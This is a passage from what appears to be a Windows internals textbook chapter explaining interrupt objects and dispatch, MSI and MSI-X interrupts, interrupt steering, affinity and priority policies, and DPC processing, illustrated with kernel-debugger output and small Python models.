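    return interrupt["dispatch"](interrupt)

# One registered vector (0x70, as in the keyboard example later on):
objects = {0x70: {"dispatch": lambda intr: "keyboard ISR ran"}}
```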
A few other dispatch routines also exist: KiInterruptDispatchNoLock,
which is used for interrupts that do not have an associated kernel-managed spinlock (typically used by
drivers that want to synchronize with their ISRs), KiInterruptDispatchNoLockNoEtw for interrupts that do
not want ETW performance tracing, and KiSpuriousDispatchNoEOI for interrupts that are not required
to send an end-of-interrupt signal since they are spurious.
Additionally, there is KiInterruptDispatchNoEOI, which is used for interrupts that have programmed the APIC in
Auto-End-of-Interrupt (Auto-EOI) mode; because the interrupt controller will send the EOI signal au-
tomatically, the kernel does not need to perform the EOI itself. For example, many HAL
interrupt routines take advantage of the "no-lock" dispatch code because the HAL does not require the
kernel to synchronize with its ISR.
Another kernel interrupt handler is KiFloatingDispatch, which is used for interrupts that require
saving the floating-point state. Unlike kernel-mode code, which typically is not allowed to use floating-
point (MMX, SSE, 3DNow!) registers because these registers won't be saved across context switches,
ISRs might need to use these registers (such as the video card ISR performing a quick drawing opera-
tion). When connecting an interrupt, drivers can set the FloatingSave argument to TRUE, requesting
that the kernel use the floating-point dispatch routine, which will save the floating-point registers. (However,
this greatly increases interrupt latency.) Note that this is supported only on 32-bit systems.
Regardless of which dispatch routine is used, ultimately a call to the ServiceRoutine field in the
interrupt object will occur; this is where the driver's ISR is stored. Alternatively, for message signaled
interrupts (MSI), which are explained later, this is a pointer to KiInterruptMessageDispatch, which will
then call the MessageServiceRoutine pointer in the interrupt object instead. Note that for some drivers, such as
those based on NDIS or StorPort (more on driver frameworks is explained in Chapter 6 of Part 1, "I/O
System"), these routines might belong to the framework or port driver, which performs further processing before calling the underlying driver.
FIGURE 8-15 Typical interrupt control flow.
Associating an ISR with a particular level of interrupt is called connecting an interrupt object, and dissoci-
ating an ISR from an IDT entry is called disconnecting an interrupt object. These operations, accomplished by
calling the kernel functions IoConnectInterruptEx and IoDisconnectInterruptEx, allow a device driver to “turn
on” an ISR when the driver is loaded into the system and to “turn off” the ISR if the driver is unloaded.
Using the interrupt object to register an ISR prevents device drivers from fiddling directly with interrupt hardware (which differs among processor architectures) and from needing
to know any details about the IDT. This kernel feature aids in creating portable device drivers because it
eliminates the need to code in assembly language or to reflect processor differences in device drivers.
Interrupt objects also allow the kernel to synchro-
nize the execution of the ISR with other parts of a device driver that might share data with the ISR. (See
Chapter 6 in Part 1 for more information about how device drivers respond to interrupts.)
We also described the concept of a chained dispatch, which allows the kernel to easily call more than
one ISR for any interrupt level. If multiple device drivers create interrupt objects and connect them
to the same IDT entry, the KiChainedDispatch routine calls each ISR when an interrupt occurs at the
specified interrupt line. This capability allows the kernel to support daisy-chain configurations,
in which several devices share the same interrupt line. The chain breaks when one of the ISRs claims
ownership for the interrupt by returning a status to the interrupt dispatcher.
If multiple devices sharing the same interrupt require service at the same time, devices not acknowl-
edged by their ISRs will interrupt the system again once the interrupt dispatcher has lowered the IRQL.
Chaining is permitted only if all the device drivers wanting to use the same interrupt indicate to the ker-
nel that they can share the interrupt (indicated by the ShareVector field of the interrupt object); if they
can't, the Plug and Play manager reorganizes their interrupt assignments to ensure that it honors
the sharing requirements of each.
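A chained dispatch can be modeled as a simple loop over the interrupt objects sharing the vector (a toy Python sketch; the device names are invented for illustration):

```python
def chained_dispatch(chain, trap_frame=None):
    """Toy KiChainedDispatch: call each ISR sharing the vector in turn;
    the walk stops when an ISR claims the interrupt by returning True."""
    for interrupt in chain:
        if interrupt["isr"](trap_frame):
            return interrupt      # owner found; remaining ISRs are skipped
    return None                   # nobody claimed the interrupt

calls = []

def make_isr(name, claims):
    def isr(trap_frame):
        calls.append(name)        # record the order ISRs were consulted
        return claims
    return isr

# Three devices sharing one interrupt line (names invented):
chain = [{"isr": make_isr("netcard", False)},
         {"isr": make_isr("audio", True)},
         {"isr": make_isr("storage", False)}]
owner = chained_dispatch(chain)
```

Here the chain breaks at the second ISR, so the third driver's ISR is never called for this interrupt; it will run again later if its device still requires service, as described above.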
EXPERIMENT: Examining interrupt internals
Using the kernel debugger, you can view details of an interrupt object, including its IRQL, ISR
address, and dispatch code. First, execute the !idt debugger command and
check whether you can locate an entry that includes a reference to I8042KeyboardInterruptService,
the ISR routine for the PS2 keyboard device. Alternatively, you can look for entries pointing to
Stornvme.sys or Scsiport.sys or any other third-party driver you recognize. (In a Hyper-V virtual
machine, some of these devices may not be present.) The following is the PS/2 keyboard
device entry:
70: fffff8045675a600 i8042prt!I8042KeyboardInterruptService (KINTERRUPT ffff8e01cbe3b280)
To view the contents of the interrupt object associated with the interrupt, you can simply click
on the link that the debugger offers, which uses the dt command, or you can manually use the
dx command as follows:
6: kd> dt nt!_KINTERRUPT ffff8e01cbe3b280
   +0x000 Type             : 0n22
   +0x002 Size             : 0n256
   +0x008 InterruptListEntry : _LIST_ENTRY [ 0x00000000`00000000 - 0x00000000`00000000 ]
   +0x018 ServiceRoutine   : 0xfffff804`65e56820   unsigned char  i8042prt!I8042KeyboardInterruptService
   +0x020 MessageServiceRoutine : (null)
   +0x028 MessageIndex     : 0
   +0x030 ServiceContext   : 0xffffe50f`9dfe9040 Void
   +0x038 SpinLock         : 0
   +0x040 TickCount        : 0
   +0x048 ActualLock       : 0xffffe50f`9dfe91a0  -> 0
   +0x050 DispatchAddress  : 0xfffff804`565ca320   void  nt!KiInterruptDispatch+0
   +0x058 Vector           : 0x70
   +0x05c Irql             : 0x7 ''
   +0x05d SynchronizeIrql  : 0x7 ''
   +0x05e FloatingSave     : 0 ''
   +0x05f Connected        : 0x1 ''
   +0x060 Number           : 6
   +0x064 ShareVector      : 0 ''
   +0x065 EmulateActiveBoth : 0 ''
   +0x066 ActiveCount      : 0
   +0x068 InternalState    : 0n4
   +0x06c Mode             : 1 ( Latched )
   +0x070 Polarity         : 0 ( InterruptPolarityUnknown )
   +0x074 ServiceCount     : 0
   +0x078 DispatchCount    : 0
   +0x080 PassiveEvent     : (null)
   +0x088 TrapFrame        : (null)
   +0x090 DisconnectData   : (null)
   +0x098 ServiceThread    : (null)
   +0x0a0 ConnectionData   : 0xffffe50f`9db3bd90 _INTERRUPT_CONNECTION_DATA
   +0x0a8 IntTrackEntry    : 0xffffe50f`9d091d90 Void
   +0x0b0 IsrDpcStats      : _ISRDPCSTATS
   +0x0f0 RedirectObject   : (null)
   +0x0f8 Padding          : [8]  ""
In this example, the IRQL that Windows assigned to the interrupt is 7, which matches the fact
that the interrupt vector is 0x70 (whose upper 4 bits encode the IRQL). Additionally, you can tell
from the DispatchAddress field that this is a regular KiInterruptDispatch-style interrupt with no
additional optimizations or sharing.
If you wanted to see which GSIV (IRQ) was associated with the interrupt, there are two ways
to obtain this data. First, recent versions of Windows store an
INTERRUPT_CONNECTION_DATA structure embedded in the ConnectionData field of the
interrupt object, as shown in the preceding output. You can use the dt command to dump the
pointer from your system as follows:
6: kd> dt 0xffffe50f`9db3bd90 _INTERRUPT_CONNECTION_DATA Vectors[0]..
nt!_INTERRUPT_CONNECTION_DATA
   +0x008 Vectors          : [0]
      +0x000 Type          : 0 ( InterruptTypeControllerInput )
      +0x004 Vector        : 0x70
      +0x008 Irql          : 0x7 ''
      +0x00c Polarity      : 1 ( InterruptActiveHigh )
      +0x010 Mode          : 1 ( Latched )
      +0x018 TargetProcessors :
         +0x000 Mask          : 0xff
         +0x008 Group         : 0
         +0x00a Reserved      : [3] 0
      +0x028 IntRemapInfo :
         +0x000 IrtIndex      : 0y000000000000000000000000000000 (0)
         +0x000 FlagHalInternal : 0y0
         +0x000 FlagTranslated : 0y0
         +0x004 u             : <anonymous-tag>
      +0x038 ControllerInput :
         +0x000 Gsiv          : 1
The Type indicates that this is a traditional line/controller-based input, and the Vector
and Irql fields confirm the values seen in the KINTERRUPT structure. Because this is a
controller-based interrupt, the ControllerInput union is the valid one, and it shows a GSIV of 1. If this had been a
different kind of interrupt, such as a Message Signaled Interrupt (more on this later), you would
dereference the MessageRequest field instead.
Another way to map GSIV to interrupt vectors is to recall that Windows keeps track of this
translation when managing device resources through what are called arbiters. For each resource
type, an arbiter maintains the relationship between virtual resource usage (such as an interrupt
vector) and physical resources (such as an interrupt line). As such, you can query the ACPI IRQ
arbiter and obtain this mapping. Use the !acpiirqarb command to obtain information on the
ACPI IRQ arbiter:
6: kd> !acpiirqarb
Processor 0 (0, 0):
Device Object: 0000000000000000
Current IDT Allocation:
...
000000070 - 00000070 D ffffe50f9959baf0 (i8042prt) A:ffffce0717950280 IRQ(GSIV):1
...
Note that the GSIV for the keyboard is IRQ 1, which is a legacy number from back in the IBM
PC/AT days that has persisted to this day. You can also use !arbiter 4 (4 tells the debugger to
display only interrupt arbiters):
6: kd> !arbiter 4
DEVNODE ffffe50f97445c70 (ACPI_HAL\PNP0C08\0)
Interrupt Arbiter "ACPI_IRQ" at fffff804575415a0
Allocated ranges:
0000000000000001 - 0000000000000001
ffffe50f9959baf0 (i8042prt)
Note that in either output, you are given the owner of the vector, in the form of a device object.
You can then use the !devobj command to get information on
the i8042prt device in this example (which corresponds to the PS/2 driver):
6: kd> !devobj 0xFFFFE50F9959BAF0
Device object (ffffe50f9959baf0) is for:
00000049 \Driver\ACPI DriverObject ffffe50f974356f0
Current Irp 00000000 RefCount 1 Type 00000032 Flags 00001040
SecurityDescriptor ffffce0711ebf3e0 DevExt ffffe50f995573f0 DevObjExt ffffe50f9959bc40
DevNode ffffe50f9959e670
ExtensionFlags (0x00000800) DOE_DEFAULT_SD_PRESENT
Characteristics (0x00000080) FILE_AUTOGENERATED_DEVICE_NAME
AttachedDevice (Upper) ffffe50f9dfe9040 \Driver\i8042prt
Device queue is not busy.
The device object is associated with a device node, which stores all the device's physical resourc-
es. You can now dump these resources with the !devnode command, using the 0xF flag to
ask for both raw and translated resource information:
6: kd> !devnode ffffe50f9959e670 f
DevNode 0xffffe50f9959e670 for PDO 0xffffe50f9959baf0
InstancePath is "ACPI\LEN0071\4&36899b7b&0"
ServiceName is "i8042prt"
TargetDeviceNotify List - f 0xffffce0717307b20 b 0xffffce0717307b20
State = DeviceNodeStarted (0x308)
Previous State = DeviceNodeEnumerateCompletion (0x30d)
CmResourceList at 0xffffce0713518330 Version 1.1 Interface 0xf Bus #0
  Entry 0 - Port (0x1) Device Exclusive (0x1)
    Flags (PORT_MEMORY PORT_IO 16_BIT_DECODE)
    Range starts at 0x60 for 0x1 bytes
  Entry 1 - Port (0x1) Device Exclusive (0x1)
    Flags (PORT_MEMORY PORT_IO 16_BIT_DECODE)
    Range starts at 0x64 for 0x1 bytes
  Entry 2 - Interrupt (0x2) Device Exclusive (0x1)
    Flags (LATCHED)
    Level 0x1, Vector 0x1, Group 0, Affinity 0xffffffff
...
TranslatedResourceList at 0xffffce0713517bb0 Version 1.1 Interface 0xf Bus #0
  Entry 0 - Port (0x1) Device Exclusive (0x1)
    Flags (PORT_MEMORY PORT_IO 16_BIT_DECODE)
    Range starts at 0x60 for 0x1 bytes
  Entry 1 - Port (0x1) Device Exclusive (0x1)
    Flags (PORT_MEMORY PORT_IO 16_BIT_DECODE)
    Range starts at 0x64 for 0x1 bytes
  Entry 2 - Interrupt (0x2) Device Exclusive (0x1)
    Flags (LATCHED)
    Level 0x7, Vector 0x70, Group 0, Affinity 0xff
The device node tells you that this device has a resource list with three entries, one of which
is an interrupt entry corresponding to IRQ 1. (In the raw resource list, the level and vector numbers represent the GSIV
rather than the IRQL and interrupt vector.) Further down, the translated resource list shows the
IRQL as 7 (this is the level number) and the interrupt vector as 0x70.
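The relationship between the two numberings in this output boils down to a one-liner: on APIC-based x86/x64 systems, the IRQL corresponds to the upper four bits of the interrupt vector (an illustrative helper, not a real API):

```python
def irql_from_vector(vector):
    """On APIC-based x86/x64 systems, the IRQL associated with an
    interrupt vector is the vector's upper four bits."""
    return vector >> 4

# The PS/2 keyboard entry from this experiment: GSIV 1 -> vector 0x70 -> IRQL 7.
keyboard_irql = irql_from_vector(0x70)
```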
On ACPI systems, you can also obtain this information in a slightly easier way by reading the
extended output of the !acpiirqarb command introduced earlier. As part of its output, it displays
the IRQ to IDT mapping table:
Interrupt Controller (Inputs: 0x0-0x77):
(01)Cur:IDT-70 Ref-1 Boot-0 edg hi Pos:IDT-00 Ref-0 Boot-0 lev unk
(02)Cur:IDT-80 Ref-1 Boot-1 edg hi Pos:IDT-00 Ref-0 Boot-1 lev unk
(08)Cur:IDT-90 Ref-1 Boot-0 edg hi Pos:IDT-00 Ref-0 Boot-0 lev unk
(09)Cur:IDT-b0 Ref-1 Boot-0 lev hi Pos:IDT-00 Ref-0 Boot-0 lev unk
(0e)Cur:IDT-a0 Ref-1 Boot-0 lev low Pos:IDT-00 Ref-0 Boot-0 lev unk
(10)Cur:IDT-b5 Ref-2 Boot-0 lev low Pos:IDT-00 Ref-0 Boot-0 lev unk
(11)Cur:IDT-a5 Ref-1 Boot-0 lev low Pos:IDT-00 Ref-0 Boot-0 lev unk
(12)Cur:IDT-95 Ref-1 Boot-0 lev low Pos:IDT-00 Ref-0 Boot-0 lev unk
(14)Cur:IDT-64 Ref-2 Boot-0 lev low Pos:IDT-00 Ref-0 Boot-0 lev unk
(17)Cur:IDT-54 Ref-1 Boot-0 lev low Pos:IDT-00 Ref-0 Boot-0 lev unk
(1f)Cur:IDT-a6 Ref-1 Boot-0 lev low Pos:IDT-00 Ref-0 Boot-0 lev unk
(41)Cur:IDT-96 Ref-1 Boot-0 edg hi Pos:IDT-00 Ref-0 Boot-0 lev unk
For more information on device objects, resources, and other related concepts, see Chapter 6 in Part 1.
Line-based versus message signaled–based interrupts
Shared interrupts are often the cause of high interrupt latency and can also cause stability issues. They
are typically undesirable and a side effect of the limited number of physical interrupt lines on a com-
puter. For example, in the case of a 4-in-1 media card reader supporting USB, Compact Flash, Sony
Memory Stick, Secure Digital, and other formats, all the controllers that are part of the same physical
device would be connected to a single interrupt line, which is then configured by the differ-
ent device drivers as a shared interrupt vector. This adds latency as each one is called in a sequence to
determine the actual controller that is sending the interrupt for the media device.
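The latency cost can be modeled by counting how many ISRs must probe their hardware before the owner is found (a toy Python sketch; the controller names are invented):

```python
def shared_line_interrupt(handlers):
    """Toy model of a shared interrupt line: each registered ISR runs in
    sequence and must query its own controller to learn whether that
    controller actually raised the interrupt; every miss adds latency."""
    probes = 0
    for name, raised_interrupt in handlers:
        probes += 1                  # one hardware probe per ISR in the chain
        if raised_interrupt():
            return name, probes
    return None, probes

# Four controllers in one media card reader sharing a single line;
# only the Secure Digital controller actually interrupted:
handlers = [("usb", lambda: False), ("compact_flash", lambda: False),
            ("memory_stick", lambda: False), ("secure_digital", lambda: True)]
```

In the worst case, every ISR on the line pays a hardware round-trip before the true source is identified, which is exactly the latency cost the text describes.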
A much better solution is for each device controller to have its own interrupt and for one driver to
manage the different interrupts, knowing which device they came from. However, consuming four tra-
ditional IRQ lines for a single device quickly leads to IRQ line exhaustion. Additionally, PCI devices are
each connected to only one IRQ line anyway, so the media card reader cannot use more than one IRQ
line in the first place.
Other problems with generating interrupts through an IRQ line are that incorrect management of the
IRQ signal can lead to interrupt storms or other kinds of deadlocks on the machine, because the signal
is driven high or low until the ISR acknowledges the hardware. (Furthermore, the interrupt controller must typi-
cally receive an EOI signal as well.) If either of these does not happen due to a bug, the system can end
up in an interrupt state forever, further interrupts could be masked away, or both. Finally, line-based
interrupts provide poor scalability in multiprocessor environments. In many cases, the hardware has
the final decision as to which processor will be interrupted out of the possible set that the Plug and Play
manager selected for this interrupt, and device drivers can do little about it.
A solution to all these problems was first introduced in the PCI 2.2 standard, called message-signaled
interrupts (MSI). Although it was an optional component of the standard that was seldom found in
client machines (and mostly found on servers for network card and storage controller performance),
most modern systems, thanks to PCI Express 3.0 and later, fully embrace this model. In the MSI world, a
device delivers a message to its driver by writing to a specific memory address;
this is essentially treated like a Direct Memory Access (DMA) operation as far as hardware is concerned.
This action causes an interrupt, and Windows then calls the ISR with the message content (value) and
the address where the message was delivered. A device can also deliver multiple messages (up to 32) to
the memory address, delivering different payloads based on the event.
An extension of the MSI model, called MSI-X, introduced in the PCI 3.0 standard, adds support for 32-bit messages (instead of 16-bit), a maximum of 2048
different messages (instead of just 32), and more importantly, the ability to use a different address
(which can be dynamically determined) for each of the MSI payloads. Using a different address allows
the MSI payload to be written to a different physical address range that belongs to a different proces-
sor, or a different set of target processors, effectively enabling nonuniform memory access (NUMA)-
aware interrupt delivery by sending the interrupt to the processor that initiated the related device
request. This improves latency and scalability by monitoring both load and the closest NUMA node
during interrupt completion.
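The core of the MSI model can be sketched as a memory write that carries the interrupt payload (a toy Python model; the address value is merely illustrative of the x86 LAPIC MSI region, and the routing dictionary stands in for the interrupt-routing hardware):

```python
def msi_write(memory, address, value, routing):
    """Toy MSI model: the device delivers its message by writing a value to
    a special address (hardware treats this like a DMA write); the write
    triggers an interrupt, and the ISR receives both the message content
    and the address it was delivered to."""
    memory[address] = value
    isr = routing[address]           # routing table stands in for the hardware
    return isr(value, address)

# One ISR registered for one message address (address is illustrative):
routing = {0xFEE00000: lambda value, address: ("handled", value, address)}
memory = {}
result = msi_write(memory, 0xFEE00000, 0x12, routing)
```

Because the payload arrives with the interrupt itself, the ISR never has to go back to the device to ask what happened, which is the latency win described in the text.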
In either model, because communication is based across a memory value, and because the content
is delivered with the interrupt, the need for IRQ lines is removed (making the total system limit of MSIs
equal to the number of interrupt vectors, not IRQ lines), as is the need for a driver ISR to query the
device for data related to the interrupt, decreasing latency. Due to the large number of device interrupts
this model supports, Windows can decrease
latency further by directly delivering the interrupt data to the concerned ISR.
This is also one reason why Windows prefers to utilize the term "GSIV" instead of IRQ: it more generically describes an MSI vector (which is
shown as a negative number), a traditional IRQ line, or a general-purpose input/output
(GPIO) pin on an embedded device. Additionally, on ARM and ARM64 systems, neither of these
interrupt models is used; a Generic Interrupt Controller (GIC) architecture is employed instead. In Figure
8-16, you can see the Device Manager on two computer systems showing both traditional IRQ-based
GSIV assignments, as well as MSI values, which are negative.
FIGURE 8-16 IRQ and MSI-based GSIV assignment.
Interrupt steering
On systems with be-
tween 2 and 16 processors in a single processor group, Windows enables a piece of functionality called
interrupt steering to help with power and latency needs on modern consumer systems. Thanks to this fea-
ture, interrupt load can be spread across processors as needed to avoid bottlenecking a single CPU, and
the core parking engine, which was described in Chapter 6 of Part 1, can also steer interrupts away from
parked cores to avoid interrupt distribution from keeping too many processors awake at the same time.
Interrupt steering capabilities are dependent on the interrupt controller; for example, on ARM systems
with a GIC, both level-sensitive and edge (latched) triggered interrupts can be steered, whereas on APIC
systems (unless running under Hyper-V), only level-sensitive interrupts can be steered. Unfortunately,
this restriction would leave many interrupts unsteerable, which is
why Windows also implements an additional interrupt redirection model to handle these situations.
When steering is enabled, the interrupt controller is simply reprogrammed to deliver the GSIV to a
different processor's LAPIC. When redirection must be used instead,
all processors are delivery targets for the GSIV, and whichever processor received the interrupt manu-
ally issues an IPI to the target processor to which the interrupt should be steered.
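The difference between the two mechanisms can be sketched as follows (a toy Python model with invented parameter names):

```python
def deliver_interrupt(can_steer, current_cpu, target_cpu):
    """Toy model of interrupt steering versus redirection. With steering,
    the interrupt controller is reprogrammed so the target CPU receives the
    interrupt directly. With redirection, every CPU is a delivery target,
    and the receiving CPU forwards the interrupt to the target with an IPI."""
    if can_steer:
        return {"handled_on": target_cpu, "ipi_sent": False}
    ipi_needed = current_cpu != target_cpu
    return {"handled_on": target_cpu, "ipi_sent": ipi_needed}
```

The extra IPI in the redirection path is the cost Windows pays when the controller cannot steer a given interrupt type on its own.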
Windows exposes this functional-
ity through a system information class that is handled by KeIntSteerAssignCpuSetForGsiv as part of the
Real-Time Audio capabilities of Windows 10 and the CPU Set feature that was described in the "Thread
scheduling" section of Chapter 4 in Part 1. This allows a particular GSIV to be steered to a specific group
of processors that can be chosen by the user-mode application, as long as it has the Increase Base
Priority privilege, which is normally only granted to administrators or local service accounts.
Interrupt affinity and priority
Windows enables driver developers and administrators to somewhat control the processor affinity
(selecting the processor or group of processors that receives the interrupt) and affinity policy of
interrupts. This is configured through a registry value called InterruptPolicyValue in the
Interrupt Management\Affinity Policy key under the device's instance key. Table 8-5 summarizes the
values the policy can take; for more information, see https://docs.
microsoft.com/en-us/windows-hardware/drivers/kernel/interrupt-affinity-and-priority.
TABLE 8-5 IRQ affinity policies

IrqPolicyMachineDefault: The device does not require a particular affinity policy. Windows uses the
default machine policy, which (for machines with less than eight logical processors) is to select any
available processor on the machine.

IrqPolicyAllCloseProcessors: On a NUMA machine, the Plug and Play manager assigns the in-
terrupt to all the processors that are close to the device (on the same node). On non-NUMA
machines, this is the same as IrqPolicyAllProcessorsInMachine.

IrqPolicyOneCloseProcessor: On a NUMA machine, the Plug and Play manager assigns the interrupt
to one processor that is close to the device (on the same node). On non-NUMA machines, the
chosen processor will be any available processor on the system.

IrqPolicyAllProcessorsInMachine: The interrupt is processed by any available processor on the machine.

IrqPolicySpecifiedProcessors: The interrupt is processed only by one of the processors specified in
the affinity mask.

IrqPolicySpreadMessagesAcrossAllProcessors: Different message-signaled interrupts are distributed
across an optimal set of eligible processors, keeping track of NUMA topology issues, if pos-
sible. This requires MSI-X support on the device and platform.

IrqPolicyAllProcessorsInGroupWhenSteered: The interrupt is subject to interrupt steering, and as
such, the interrupt should be assigned to all processor IDTs as the target processor will be
dynamically selected based on steering rules.
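A few of these policies can be sketched as set arithmetic (a toy interpretation; the real processor selection also weighs processor groups, NUMA distance, and availability):

```python
def eligible_processors(policy, machine_cpus, close_cpus=None, specified=None):
    """Toy interpretation of some IrqPolicy* values from Table 8-5.
    Arguments are sets of CPU indices; close_cpus models the processors on
    the device's NUMA node (None on a non-NUMA machine)."""
    if policy == "IrqPolicyAllProcessorsInMachine":
        return machine_cpus
    if policy == "IrqPolicyAllCloseProcessors":
        # Non-NUMA machines behave like IrqPolicyAllProcessorsInMachine.
        return close_cpus if close_cpus else machine_cpus
    if policy == "IrqPolicyOneCloseProcessor":
        pool = close_cpus if close_cpus else machine_cpus
        return {min(pool)}            # any single close processor
    if policy == "IrqPolicySpecifiedProcessors":
        return set(specified)
    raise ValueError("unmodeled policy: " + policy)

machine = set(range(8))
node = {0, 1, 2, 3}
```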
In addition to setting this affinity policy, another registry value can also be used to set the interrupt's
priority, based on the values in Table 8-6.
TABLE 8-6 IRQ priorities

IrqPriorityUndefined: No particular priority is required by the device. It receives the default priority
(IrqPriorityNormal).

IrqPriorityLow: The device can tolerate high latency and should receive a lower IRQL than usual
(3 or 4).

IrqPriorityNormal: The device expects average latency. It receives the default IRQL associated with
its interrupt vector (5 to 11).

IrqPriorityHigh: The device requires as little latency as possible. It receives an elevated IRQL beyond
its normal assignment (12).
As discussed earlier, it is important to note that Windows is not a real-time operating system, and
as such, these IRQ priorities are hints given to the system that control only the IRQL associated with
the interrupt and provide no extra priority other than the Windows IRQL priority-scheme mechanism.
Because the IRQ priority is also stored in the registry, administrators are free to set these values for
drivers should there be a requirement of lower latency for a driver not taking advantage of this feature.
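Because these are only IRQL hints, the mapping in Table 8-6 reduces to a small lookup (an illustrative sketch, not an actual kernel function):

```python
def irql_hint(priority, default_irql):
    """Toy mapping of the IrqPriority* hints in Table 8-6. These are hints
    only: they adjust the IRQL associated with the interrupt vector and do
    not provide real-time guarantees."""
    if priority in ("IrqPriorityUndefined", "IrqPriorityNormal"):
        return default_irql       # default vector IRQL (5 to 11)
    if priority == "IrqPriorityLow":
        return 3                  # can tolerate high latency (3 or 4)
    if priority == "IrqPriorityHigh":
        return 12                 # elevated beyond the normal assignment
    raise ValueError(priority)
```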
Software interrupts
Although hardware generates most interrupts, the Windows kernel also generates software interrupts
for a variety of tasks, including these:
■ Initiating thread dispatching
■ Non-time-critical interrupt processing
■ Handling timer expiration
■ Asynchronously executing a procedure in the context of a particular thread
■ Supporting asynchronous I/O operations
These tasks are described in the following subsections.
Dispatch or deferred procedure call (DPC) interrupts
A DPC is typically an interrupt-related function that performs a processing task after all device inter-
rupts have already been handled. The functions are called deferred because they might not execute
immediately. The kernel uses DPCs to process timer expiration (and release threads waiting for the
timers) and to reschedule the processor after a thread's quantum expires (although this happens at
DPC IRQL but not really through a regular kernel DPC). Device drivers use DPCs to process interrupts
and perform actions not available at higher IRQLs. To provide timely service for hardware interrupts,
Windows—with the cooperation of device drivers—attempts to keep the IRQL below device IRQL lev-
els. One way that this goal is achieved is for device driver ISRs to perform the minimal work necessary
to acknowledge their device, save volatile interrupt state, and defer data transfer or other less time-
critical interrupt processing activity for execution in a DPC at DPC/dispatch IRQL. (See Chapter 6 in Part
1 for more information on the I/O system.)
In the case where the IRQL is passive or at APC level, DPCs will immediately execute and block all
other non-hardware-related processing, which is why they are also often used to force immediate
execution of high-priority system code. Thus, DPCs provide the operating system with the capability
to generate an interrupt and execute a system function in kernel mode. For example, when a thread
can no longer continue executing, perhaps because it has terminated or because it voluntarily enters a
wait state, the kernel calls the dispatcher directly to perform an immediate context switch. Sometimes,
however, the kernel detects that rescheduling should occur when it is deep within many layers of code.
In this situation, the kernel requests dispatching but defers its occurrence until it completes its current
activity. Using a DPC software interrupt is a convenient way to achieve this delayed processing.
The kernel always raises the processor's IRQL to DPC/dispatch level or above when it needs to
synchronize access to scheduling-related kernel structures. This disables additional software interrupts
and thread dispatching. When the kernel detects that dispatching should occur, it requests a DPC/dis-
patch-level interrupt; but because the IRQL is at or above that level, the processor holds the interrupt in
check. When the kernel completes its current activity, it sees that it will lower the IRQL below DPC/dis-
patch level and checks to see whether any dispatch interrupts are pending. If there are, the IRQL drops
to DPC/dispatch level, and the dispatch interrupts are processed. Activating the thread dispatcher by
using a software interrupt is a way to defer dispatching until conditions are right. A DPC is represented
by a DPC object, a kernel control object that is not visible to user-mode programs but is visible to de-
vice drivers and other system code. The most important piece of information the DPC object contains
is the address of the system function that the kernel will call when it processes the DPC interrupt. DPC
routines that are waiting to execute are stored in kernel-managed queues, one per processor, called
DPC queues. To request a DPC, system code calls the kernel to initialize a DPC object and then places it
in a DPC queue.
By default, the kernel places DPC objects at the end of one of two DPC queues belonging to the
processor on which the DPC was requested (typically the processor on which the ISR executed). A
device driver can override this behavior, however, by specifying a DPC priority (low, medium, medium-
high, or high, where medium is the default) and by targeting the DPC at a particular processor. A DPC
aimed at a specific CPU is known as a targeted DPC. If the DPC has a high priority, the kernel inserts the
DPC object at the front of the queue; otherwise, it is placed at the end of the queue for all other priorities.
When the processor's IRQL is about to drop from DPC/dispatch level or above to a lower
IRQL (APC or passive level), the kernel processes DPCs. Windows ensures that the IRQL remains at DPC/
dispatch level and pulls DPC objects off the current processor's queue until the queue is empty (that
is, the kernel "drains" the queue), calling each DPC function in turn. Only when the queue is empty will
the kernel let the IRQL drop below DPC/dispatch level and let regular thread execution continue. DPC
processing is depicted in Figure 8-17.
Figure 8-17 illustrates DPC delivery in four steps: (1) a timer expires, and the kernel queues a DPC that will release any threads waiting on the timer; the kernel then requests a software interrupt; (2) when the IRQL drops below DPC/dispatch level, a DPC interrupt occurs; (3) after the DPC interrupt, control transfers to the (thread) dispatcher; (4) the dispatcher executes each DPC routine in the DPC queue, emptying the queue as it proceeds. If required, the dispatcher also reschedules the processor.
FIGURE 8-17 Delivering a DPC.
DPC priorities can affect system behavior another way. The kernel usually initiates DPC queue
draining with a DPC/dispatch-level interrupt. The kernel generates such an interrupt only if the DPC is
directed at the current processor (the one on which the ISR executes) and the DPC has a priority higher
than low. If the DPC has a low priority, the kernel requests the interrupt only if the number of outstanding DPC requests for the processor (stored in the DpcQueueDepth field) exceeds a threshold (called MaximumDpcQueueDepth), or if the number of DPCs requested on the processor within a time window is low.
If a DPC is targeted at a CPU different from the one on which the ISR is running, and the DPC's priority is either high or medium-high, the kernel immediately signals the target CPU (by sending it a dispatch IPI) to drain its DPC queue, but only as long as the target processor is idle. If the priority is medium or low, the number of DPCs queued on the target processor (this being the DpcQueueDepth again) must exceed a threshold (the MaximumDpcQueueDepth) for the kernel to trigger a DPC/dispatch interrupt. The system idle thread also drains the DPC queue for the processor it runs on. Although DPC targeting and priority levels are flexible, device drivers rarely need to change the default behavior of their DPC objects. Table 8-7 summarizes the situations that initiate DPC queue draining. Medium-high and high appear, and are, in fact, equal priorities when looking at the generation rules. The difference comes from their insertion in the list, with high interrupts being at the head and medium-high interrupts at the tail.
TABLE 8-7 DPC interrupt generation rules

DPC Priority   DPC Targeted at ISR's Processor              DPC Targeted at Another Processor
Low            DPC queue length exceeds maximum DPC         DPC queue length exceeds maximum DPC
               queue length, or DPC request rate is         queue length, or system is idle
               less than minimum DPC request rate
Medium         Always                                       DPC queue length exceeds maximum DPC
                                                            queue length, or system is idle
Medium-High    Always                                       Target processor is idle
High           Always                                       Target processor is idle
Additionally, Table 8-8 describes the various DPC adjustment variables and their default values, which can be modified by using the SystemDpcBehaviorInformation system information class.

TABLE 8-8 DPC interrupt generation variables

Variable             Definition                                            Default
DpcQueueDepth        Number of DPCs queued before an interrupt will be     4
                     sent even for Medium or below DPCs
MinimumDpcRate       Number of DPCs per clock tick where low DPCs will     3
                     not cause a local interrupt to be generated
IdealDpcRate         Number of DPCs per clock tick before the maximum      20
                     DPC queue depth is decremented if DPCs are pending
                     but no interrupt was generated
AdjustDpcThreshold   Number of clock ticks before the maximum DPC          20
                     queue depth is incremented if DPCs aren't pending
Because user-mode threads execute at low IRQL, the chances are good that a DPC will interrupt the execution of an ordinary user's thread. DPC routines execute without regard to what thread is running, meaning that when a DPC routine runs, it can't assume what process address space is currently mapped. DPC routines can call kernel functions, but they can't call system services, generate page faults, or create or wait for dispatcher objects (explained later in this chapter). They can, however, access nonpaged system memory addresses, because system address space is always mapped regardless of what the current process is.
Because all user-mode memory is pageable and the DPC executes in an arbitrary process context,
DPC code should never access user-mode memory in any way. On systems that support Supervisor
